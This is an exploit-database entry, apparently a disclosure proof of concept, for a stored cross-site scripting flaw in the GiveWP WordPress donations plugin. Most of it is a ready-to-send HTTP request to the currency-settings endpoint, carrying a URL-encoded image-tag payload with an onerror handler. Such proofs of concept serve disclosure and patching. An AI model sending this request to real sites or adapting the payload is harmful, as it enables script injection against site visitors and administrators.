## https://sploitus.com/exploit?id=WPEX-ID:DAA9B6C1-1EE1-434C-9F88-FD273B7E20BB
Get a REST nonce (logged in as admin): `https://example.com/wp-admin/admin-ajax.php?action=rest-nonce`
POST /?rest_route=/give-api/v2/onboarding/settings/currency HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 149
Connection: close
Cookie: [admin+]
_wpnonce=fdde54ee91&value=%22%5c%75%30%30%32%32%5c%75%30%30%33%63%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e%22
The XSS will be triggered when editing/viewing/previewing any Donations forms